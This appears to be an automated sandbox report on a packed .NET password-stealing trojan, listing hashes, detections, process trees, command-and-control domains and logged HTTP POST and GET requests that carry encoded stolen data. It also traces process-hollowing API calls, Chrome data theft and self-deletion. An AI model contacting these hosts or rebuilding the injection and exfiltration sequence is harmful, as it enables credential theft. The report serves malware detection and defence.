Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Sept. 14, 2023, 7:04 p.m.	Sept. 14, 2023, 7:09 p.m.

Size	634.0KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`2e6868ba26f8fa8bd7ee1e865165da8c`
SHA256	`9fe145f64a6f2ed8283b9bfb1e97a3c93087d8495a53af984d619760c7d859a5`
CRC32	`AE6E4B8A`
ssdeep	`12288:TyRF2iNcQhcQll/68UXs+IGCRZDunEVrQoTa0swv5xFDdb:TgF1nhlCu+wZDunERrTUwv5x/`
PDB Path	NoXr.pdb
Yara	PE_Header_Zero - PE File Signature IsPE32 - (no description) Is_DotNET_EXE - (no description) Win32_Trojan_PWS_Net_1_Zero - Win32 Trojan PWS .NET Azorult

wininit.exe "C:\Users\test22\AppData\Local\Temp\wininit.exe"
1608
- wininit.exe "C:\Users\test22\AppData\Local\Temp\wininit.exe"
  2644
explorer.exe "C:\Windows\SysWOW64\explorer.exe"
2776
- firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
  2920

Name	Response	Post-Analysis Lookup
www.shakcham.top	A 203.161.62.123	203.161.62.123
www.edf23hravau.xyz	CNAME 168.pcwbvulypm13.com A 20.247.39.217	20.247.39.217
www.jedidylan.com	A 204.11.56.48	204.11.56.48
www.ssongg9873.cfd	A 43.135.11.21	43.135.11.21
www.ssongg12497.cfd	A 101.32.68.183	101.32.68.183
www.ekcc.xyz	A 91.195.240.94	91.195.240.94
www.sqlite.org	A 45.33.6.223	45.33.6.223
www.igrashka.net	A 91.206.200.88	91.206.200.88

IP Address	Status	Action
101.32.68.183	Active	Moloch
164.124.101.2	Active	Moloch
20.247.39.217	Active	Moloch
203.161.62.123	Active	Moloch
204.11.56.48	Active	Moloch
43.135.11.21	Active	Moloch
45.33.6.223	Active	Moloch
91.195.240.94	Active	Moloch
91.206.200.88	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49179 -> 203.161.62.123:80	2023882	ET INFO HTTP Request to a *.top domain	Potentially Bad Traffic
UDP 192.168.56.103:56613 -> 164.124.101.2:53	2023883	ET DNS Query to a *.top domain - Likely Hostile	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 14, 2023, 7:03 p.m.			0	0
IsDebuggerPresent Sept. 14, 2023, 7:03 p.m.			0	0

This executable has a PDB path (1 event)

pdb_path

NoXr.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 14, 2023, 7:03 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Performs some HTTP requests (14 events)

request	POST http://www.igrashka.net/hcn4/
request	GET http://www.igrashka.net/hcn4/?VIRj7u78=m30+Ki//Y8sL2zE0P61kdhvYOwqWFptCCmwU8vQq6zE1sjNGfZDnTyH3LHXrki/eEv4hHjHktamnN/oDf7D42Eqb/YZUuybaqZkYvtQ=&Jp9mk=ckhWXGmBftOyoVNf
request	GET http://www.sqlite.org/2016/sqlite-dll-win32-x86-3100000.zip
request	GET http://www.sqlite.org/2022/sqlite-dll-win32-x86-3380000.zip
request	GET http://www.sqlite.org/2016/sqlite-dll-win32-x86-3150000.zip
request	GET http://www.sqlite.org/2017/sqlite-dll-win32-x86-3170000.zip
request	POST http://www.edf23hravau.xyz/hcn4/
request	GET http://www.edf23hravau.xyz/hcn4/?VIRj7u78=THRJx5HoM4pxizf3tffVux/F1dnvdAzr5GPiuCoKifJxde7dkuco3WiYLQ8onutaznLrkvN96f0rnicV+F6qZ7Z7/ZoKrPI7mfac+KI=&Jp9mk=ckhWXGmBftOyoVNf
request	GET http://www.jedidylan.com/hcn4/?VIRj7u78=OEaMQIXzJ1y0Ti/BrjZfTQsudV+gIEPJKSCSuDa5GJUseBJeyfizYkge5InQO6hD9ZXOEPkPQpdLpgPCjm1/NgvgONU/CrlD65E5YMY=&Jp9mk=ckhWXGmBftOyoVNf
request	POST http://www.shakcham.top/hcn4/
request	GET http://www.shakcham.top/hcn4/?VIRj7u78=VLrMamQnDTGMeMJgx6hkOx5BwaKLG+lWawKYC9Jql/bfu43cgRCDr21Ipw5nqE2MDIkIhr3bxwasMrx+aUmXse9uaxrLWLp/EVeQozE=&Jp9mk=ckhWXGmBftOyoVNf
request	GET http://www.ekcc.xyz/hcn4/?VIRj7u78=om4NFYT3TXA6pgTJPX84EKmZ3QuIf6Fm+NGGNTX2Njr3wYMs1PvUHqCFX1UG/yqqZ/GyGdZe8kkoP2oQdk3G5tENNPGEvkfEzBvgy4w=&Jp9mk=ckhWXGmBftOyoVNf
request	POST http://www.ssongg12497.cfd/hcn4/
request	GET http://www.ssongg12497.cfd/hcn4/?VIRj7u78=x2uJ4u9RM1nVLx9RY8bcWHYUZIRoQlSU64mz3eHM0QiCPE4P0FZMVIShEzgG2lVG6Gbc5vdNKYVNMWtwdeV8UK1q6UmnGIB9sfUNvKw=&Jp9mk=ckhWXGmBftOyoVNf

Sends data using the HTTP POST Method (4 events)

request	POST http://www.igrashka.net/hcn4/
request	POST http://www.edf23hravau.xyz/hcn4/
request	POST http://www.shakcham.top/hcn4/
request	POST http://www.ssongg12497.cfd/hcn4/

Allocates read-write-execute memory (usually to unpack itself) (29 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Sept. 14, 2023, 7:03 p.m.	process_identifier: 1608 region_size: 983040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00370000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2023, 7:03 p.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00420000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 14, 2023, 7:03 p.m.	process_identifier: 1608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f31000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 14, 2023, 7:03 p.m.	process_identifier: 1608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f32000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2023, 7:03 p.m.	process_identifier: 1608 region_size: 393216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00460000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2023, 7:03 p.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00480000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2023, 7:03 p.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2023, 7:03 p.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2023, 7:03 p.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2023, 7:03 p.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2023, 7:03 p.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2023, 7:03 p.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00920000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2023, 7:03 p.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2023, 7:03 p.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003ca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2023, 7:03 p.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2023, 7:03 p.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003ba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2023, 7:03 p.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2023, 7:03 p.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00921000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2023, 7:04 p.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003ac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2023, 7:04 p.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00922000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2023, 7:04 p.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00923000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2023, 7:04 p.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003bd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2023, 7:04 p.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00924000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2023, 7:04 p.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00925000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2023, 7:04 p.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00926000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2023, 7:04 p.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00927000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2023, 7:04 p.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00928000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2023, 7:07 p.m.	process_identifier: 2644 region_size: 3158016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a90000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2023, 7:07 p.m.	process_identifier: 2776 region_size: 3158016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1

Steals private information from local Internet browsers (1 event)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\wininit.exe

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\wininit.exe

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x0009de00', u'virtual_address': u'0x00002000', u'entropy': 7.957137774147262, u'name': u'.text', u'virtual_size': u'0x0009dc70'}

entropy

7.95713777415

description

A section with a high entropy has been found

entropy

0.996842936069

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Sept. 14, 2023, 7:07 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Sept. 14, 2023, 7:07 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (7 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Bypass DEP	rule	disable_dep

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Sept. 14, 2023, 7:04 p.m.	process_identifier: 2644 region_size: 237568 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000248	1	0	0

Deletes executed files from disk (1 event)

file	C:\Users\test22\AppData\Local\Temp\wininit.exe

Network communications indicative of possible code injection originated from the process explorer.exe (29 events)

Time & API	Arguments	Status	Return
connect Sept. 14, 2023, 7:08 p.m.	ip_address: 45.33.6.223 socket: 828 port: 80		4294967295
send Sept. 14, 2023, 7:08 p.m.	buffer: ! socket: 720 sent: 1	1	1
send Sept. 14, 2023, 7:08 p.m.	buffer: GET /2016/sqlite-dll-win32-x86-3100000.zip HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Host: www.sqlite.org Connection: Keep-Alive socket: 828 sent: 230	1	230
send Sept. 14, 2023, 7:08 p.m.	buffer: ! socket: 720 sent: 1	1	1
InternetCrackUrlW Sept. 14, 2023, 7:08 p.m.	url: http://www.sqlite.org/2016/sqlite-dll-win32-x86-3100000.zip flags: 0	1	1
URLDownloadToFileW Sept. 14, 2023, 7:08 p.m.	url: http://www.sqlite.org/2016/sqlite-dll-win32-x86-3100000.zip stack_pivoted: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\npjdr.zip filepath: C:\Users\test22\AppData\Local\Temp\npjdr.zip		2148270091
connect Sept. 14, 2023, 7:08 p.m.	ip_address: 45.33.6.223 socket: 848 port: 80		4294967295
send Sept. 14, 2023, 7:08 p.m.	buffer: ! socket: 720 sent: 1	1	1
send Sept. 14, 2023, 7:08 p.m.	buffer: GET /2022/sqlite-dll-win32-x86-3380000.zip HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Host: www.sqlite.org Connection: Keep-Alive socket: 848 sent: 230	1	230
send Sept. 14, 2023, 7:08 p.m.	buffer: ! socket: 720 sent: 1	1	1
InternetCrackUrlW Sept. 14, 2023, 7:08 p.m.	url: http://www.sqlite.org/2022/sqlite-dll-win32-x86-3380000.zip flags: 0	1	1
URLDownloadToFileW Sept. 14, 2023, 7:08 p.m.	url: http://www.sqlite.org/2022/sqlite-dll-win32-x86-3380000.zip stack_pivoted: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\cdutvbd.zip filepath: C:\Users\test22\AppData\Local\Temp\cdutvbd.zip		2148270091
connect Sept. 14, 2023, 7:08 p.m.	ip_address: 45.33.6.223 socket: 848 port: 80		4294967295
send Sept. 14, 2023, 7:08 p.m.	buffer: ! socket: 720 sent: 1	1	1
send Sept. 14, 2023, 7:08 p.m.	buffer: GET /2016/sqlite-dll-win32-x86-3150000.zip HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Host: www.sqlite.org Connection: Keep-Alive socket: 848 sent: 230	1	230
send Sept. 14, 2023, 7:08 p.m.	buffer: ! socket: 720 sent: 1	1	1
InternetCrackUrlW Sept. 14, 2023, 7:08 p.m.	url: http://www.sqlite.org/2016/sqlite-dll-win32-x86-3150000.zip flags: 0	1	1
URLDownloadToFileW Sept. 14, 2023, 7:08 p.m.	url: http://www.sqlite.org/2016/sqlite-dll-win32-x86-3150000.zip stack_pivoted: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\yn7hd.zip filepath: C:\Users\test22\AppData\Local\Temp\yn7hd.zip		2148270091
connect Sept. 14, 2023, 7:08 p.m.	ip_address: 45.33.6.223 socket: 876 port: 80		4294967295
send Sept. 14, 2023, 7:08 p.m.	buffer: ! socket: 720 sent: 1	1	1
send Sept. 14, 2023, 7:08 p.m.	buffer: GET /2017/sqlite-dll-win32-x86-3170000.zip HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Host: www.sqlite.org Connection: Keep-Alive socket: 876 sent: 230	1	230
send Sept. 14, 2023, 7:08 p.m.	buffer: ! socket: 720 sent: 1	1	1
InternetCrackUrlW Sept. 14, 2023, 7:08 p.m.	url: http://www.sqlite.org/2017/sqlite-dll-win32-x86-3170000.zip flags: 0	1	1
URLDownloadToFileW Sept. 14, 2023, 7:08 p.m.	url: http://www.sqlite.org/2017/sqlite-dll-win32-x86-3170000.zip stack_pivoted: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\mpkl4rjh.zip filepath: C:\Users\test22\AppData\Local\Temp\mpkl4rjh.zip		2148270091
connect Sept. 14, 2023, 7:08 p.m.	ip_address: 45.33.6.223 socket: 892 port: 80		4294967295
send Sept. 14, 2023, 7:08 p.m.	buffer: ! socket: 720 sent: 1	1	1
send Sept. 14, 2023, 7:08 p.m.	buffer: GET /2022/sqlite-dll-win32-x86-3380000.zip HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Host: www.sqlite.org Range: bytes=13140- Unless-Modified-Since: Sat, 12 Mar 2022 13:56:34 GMT If-Range: "m622ca692s8a577" Connection: Keep-Alive socket: 892 sent: 334	1	334
send Sept. 14, 2023, 7:08 p.m.	buffer: ! socket: 720 sent: 1	1	1
URLDownloadToFileW Sept. 14, 2023, 7:08 p.m.	url: http://www.sqlite.org/2022/sqlite-dll-win32-x86-3380000.zip stack_pivoted: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\ehc0tv.zip filepath: C:\Users\test22\AppData\Local\Temp\ehc0tv.zip		2148270091

Potential code injection by writing to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Sept. 14, 2023, 7:04 p.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿá¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $y =`gó=`gó=`gó¦¨ó:`gó¦ªó<`gó¦«ó<`góRich=`góPELWz`àÐ @ @.text ` base_address: 0x00400000 process_identifier: 2644 process_handle: 0x00000248	1	1	0
WriteProcessMemory Sept. 14, 2023, 7:04 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2644 process_handle: 0x00000248	1	1	0

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Sept. 14, 2023, 7:04 p.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿá¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $y =`gó=`gó=`gó¦¨ó:`gó¦ªó<`gó¦«ó<`góRich=`góPELWz`àÐ @ @.text ` base_address: 0x00400000 process_identifier: 2644 process_handle: 0x00000248	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1608 called NtSetContextThread to modify thread in remote process 2644
NtSetContextThread Sept. 14, 2023, 7:04 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4199632 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000244 process_identifier: 2644	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1608 resumed a thread in remote process 2644
NtResumeThread Sept. 14, 2023, 7:04 p.m.	thread_handle: 0x00000244 suspend_count: 1 process_identifier: 2644	1	0	0

Executed a process and injected code into it, probably while unpacking (16 events)

Time & API	Arguments	Status	Return
NtResumeThread Sept. 14, 2023, 7:03 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 1608	1	0
NtResumeThread Sept. 14, 2023, 7:03 p.m.	thread_handle: 0x0000014c suspend_count: 1 process_identifier: 1608	1	0
NtResumeThread Sept. 14, 2023, 7:03 p.m.	thread_handle: 0x00000190 suspend_count: 1 process_identifier: 1608	1	0
NtResumeThread Sept. 14, 2023, 7:04 p.m.	thread_handle: 0x0000023c suspend_count: 1 process_identifier: 1608	1	0
NtGetContextThread Sept. 14, 2023, 7:04 p.m.	thread_handle: 0x000000e0	1	0
NtGetContextThread Sept. 14, 2023, 7:04 p.m.	thread_handle: 0x000000e0	1	0
NtResumeThread Sept. 14, 2023, 7:04 p.m.	thread_handle: 0x000000e0 suspend_count: 1 process_identifier: 1608	1	0
CreateProcessInternalW Sept. 14, 2023, 7:04 p.m.	thread_identifier: 2648 thread_handle: 0x00000244 process_identifier: 2644 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\wininit.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\wininit.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000248	1	1
NtGetContextThread Sept. 14, 2023, 7:04 p.m.	thread_handle: 0x00000244	1	0
NtAllocateVirtualMemory Sept. 14, 2023, 7:04 p.m.	process_identifier: 2644 region_size: 237568 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000248	1	0
WriteProcessMemory Sept. 14, 2023, 7:04 p.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿá¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $y =`gó=`gó=`gó¦¨ó:`gó¦ªó<`gó¦«ó<`góRich=`góPELWz`àÐ @ @.text ` base_address: 0x00400000 process_identifier: 2644 process_handle: 0x00000248	1	1
WriteProcessMemory Sept. 14, 2023, 7:04 p.m.	buffer: base_address: 0x00401000 process_identifier: 2644 process_handle: 0x00000248	1	1
WriteProcessMemory Sept. 14, 2023, 7:04 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2644 process_handle: 0x00000248	1	1
NtSetContextThread Sept. 14, 2023, 7:04 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4199632 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000244 process_identifier: 2644	1	0
NtResumeThread Sept. 14, 2023, 7:04 p.m.	thread_handle: 0x00000244 suspend_count: 1 process_identifier: 2644	1	0
CreateProcessInternalW Sept. 14, 2023, 7:08 p.m.	thread_identifier: 2924 thread_handle: 0x00000370 process_identifier: 2920 current_directory: filepath: C:\Program Files\Mozilla Firefox\firefox.exe track: 1 command_line: filepath_r: C:\Program Files\Mozilla Firefox\Firefox.exe stack_pivoted: 0 creation_flags: 12 (CREATE_SUSPENDED\|DETACHED_PROCESS) inherit_handles: 0 process_handle: 0x00000338	1	1

File has been identified by 39 AntiVirus engines on VirusTotal as malicious (39 events)

Lionic	Trojan.Win32.Noon.4!c
MicroWorld-eScan	Trojan.GenericKD.69256446
FireEye	Trojan.GenericKD.69256446
Cylance	unsafe
Sangfor	Suspicious.Win32.Save.a
Arcabit	Trojan.Generic.D420C4FE
BitDefenderTheta	Gen:NN.ZemsilCO.36662.Nm0@aiTxdSn
Cyren	W32/MSIL_Agent.FPI.gen!Eldorado
Symantec	Scr.Malcode!gdn34
Elastic	malicious (high confidence)
ESET-NOD32	a variant of MSIL/GenKryptik.GNUG
APEX	Malicious
Cynet	Malicious (score: 100)
Kaspersky	HEUR:Trojan-Spy.MSIL.Noon.gen
BitDefender	Trojan.GenericKD.69256446
Avast	Win32:PWSX-gen [Trj]
DrWeb	Trojan.Packed2.45679
McAfee-GW-Edition	BehavesLike.Win32.Generic.jc
Trapmine	suspicious.low.ml.score
Sophos	Mal/Generic-S
SentinelOne	Static AI - Malicious PE
Webroot	W32.Trojan.Gen
MAX	malware (ai score=80)
Microsoft	Trojan:Win32/FormBook.AFK!MTB
ZoneAlarm	HEUR:Trojan-Spy.MSIL.Noon.gen
GData	Trojan.GenericKD.69256446
Google	Detected
AhnLab-V3	Malware/Win.Generic.C5486762
McAfee	Artemis!2E6868BA26F8
Malwarebytes	Trojan.MalPack.PNG.Generic
Panda	Trj/Chgt.AD
TrendMicro-HouseCall	TROJ_GEN.R002H07ID23
Rising	Malware.Obfus/MSIL@AI.100 (RDM.MSIL2:9UpiW8ZmYc5xxAjw7yj5Yw)
Ikarus	Trojan.MSIL.Krypt
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	W32/Malicious_Behavior.VEX
AVG	Win32:PWSX-gen [Trj]
DeepInstinct	MALICIOUS
CrowdStrike	win/malicious_confidence_100% (W)

wininit.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All